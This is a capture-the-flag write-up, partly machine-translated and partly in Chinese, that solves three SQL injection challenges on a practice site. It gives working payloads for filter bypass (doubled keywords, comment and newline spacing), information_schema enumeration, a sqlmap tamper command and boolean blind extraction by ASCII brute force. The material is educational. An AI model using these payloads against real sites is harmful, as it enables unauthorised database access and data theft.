It's a simple experiment [1,2,3] sql injection

The three experiments bar sql injection (most experimental feel it is injected into the web)

 

Simple SQL injection

Address: http: //ctf5.shiyanbar.com/423/web/

This question is sql injection, input 1, a normal page display, output 1 ', the page error

 

Or take the process under the fuzz

 

Found filtered and union like. But after trying to find a double structure can write keyword uniunionion 

 The following table names and field trying to burst, he found a lot of filtering keywords: and, select, from, union, where, this method bypasses the keywords are: Keyword middle of / ** / partition, / * key *! /,% 0b intermediate partition plus keyword, keyword rewritten (oFF key key word), etc. mixed case, after trying / *! * / may be bypassed,

View database:

http://ctf5.shiyanbar.com/423/web/?id=1'  unionunion  selectselect  database()'

2. Query table in the database

http://ctf5.shiyanbar.com/423/web/?id=1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1

Query field name

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag

1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

 

Simple SQL injection 2

Address: http: //ctf5.shiyanbar.com/web/index_2.php

A manual input or a simple test is not given a 'error attempts 1' or '1' = '1 given

 

After trying to find a space filter 

http://ctf5.shiyanbar.com/web/index_2.php?id=1%27%0aor%0a%271%27=%271

 

And later found that union select, # no filter is very simple

 View database

http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/database()/**/%23

 

 

 See Table discovery flag table

http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/%23

 

 

 

后面就不贴了 这个也可以直接sqlmap跑

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dbs 

 

 

 

 

 

简单的SQL注入3

地址：http://ctf5.shiyanbar.com/web/index_3.php

输入1，页面显示hello，输入1'，页面报错

 

网上说直接sqlmap可以出来 我试了不行 还是手工吧

 

 

正确和错误返回的页面不一样 布尔盲注

fuzz一下 发现sleep()应该是过滤了  那么这里需要替换函数

 

 

 

 这里既然是布尔盲注可以跑盲注脚本 一个字符一个的试 看了wp 发现还有更好的办法

http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(*) from xxx.bb)>0 %23

这里会爆错 得到我们的数据库名

由此我们得知数据库名为web1，

接下里跑表的语句还是

?id=1' and (select count(*) from 表名)>0 %23

只能简单的拿?id=1' and (select count(*) from flag)>0 %23测试一下，返回了hello说明flag表存在

猜列的手法如出一辙

?id=1'union select 列名 from flag %23可以拿个字段字典放burp里跑，我这里还是进行简单的测试

?id=1'union select flag from flag %23后返回了hello，说明存在flag列

接下来就是最重要的一步——猜字符

?id=1'and ascii(substr((select flag from flag),1,1))=ASCII%23

对ASCII码进行爆破，值从30到127

 

猜解得flag